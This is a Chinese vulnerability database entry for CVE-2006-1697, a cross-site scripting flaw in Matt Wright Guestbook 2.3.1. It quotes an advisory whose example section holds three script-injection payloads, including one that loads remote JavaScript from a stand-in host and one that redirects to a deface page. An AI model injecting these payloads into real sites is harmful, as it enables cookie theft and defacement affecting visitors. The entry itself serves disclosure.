Matt Wright Guestbook 跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110016 漏洞类型 跨站脚本
发布时间 2006-04-07 更新时间 2006-09-05
CVE编号 CVE-2006-1697 CNNVD-ID CNNVD-200604-149
漏洞平台 CGI CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/27594
https://cxsecurity.com/issue/WLB-2006040017
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-149
|漏洞详情
MattWrightGuestbook2.3.1存在跨站脚本攻击(XSS)漏洞。这使得,当发送消息时,远程攻击者可以借助于字段(1)YourName、(2)E-Mail或(3)Comments执行任意Web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/17438/info

Guestbook is prone to multiple HTML-injection vulnerabilities; the application fails to properly sanitize user-supplied input before using it in dynamically generated content. 

Attacker-supplied HTML and script code would be executed in the context of the affected website, potentially allowing an attacker to steal cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.

An example has been provided:

<script>alert(/Liz0ziM/)</script>

<script src=http://www.example.com/hacked.js></script>

<script>location.href="http://www.example.com/deface.html";</script>
|参考资料

来源:BID
名称:17438
链接:http://www.securityfocus.com/bid/17438
来源:BUGTRAQ
名称:20060408MattWrightGuestbookXssScriptİnjection
链接:http://www.securityfocus.com/archive/1/archive/1/430356/100/0/threaded
来源:OSVDB
名称:24479
链接:http://www.osvdb.org/24479
来源:VUPEN
名称:ADV-2006-1287
链接:http://www.frsirt.com/english/advisories/2006/1287
来源:SECUNIA
名称:19586
链接:http://secunia.com/advisories/19586
来源:MISC
链接:http://liz0zim.no-ip.org/mattguestbook.html
来源:XF
名称:guestbook-guestbook-parameters-xss(25697)
链接:http://xforce.iss.net/xforce/xfdb/25697
来源:SREASON
名称:681
链接:http://securityreason.com/securityalert/681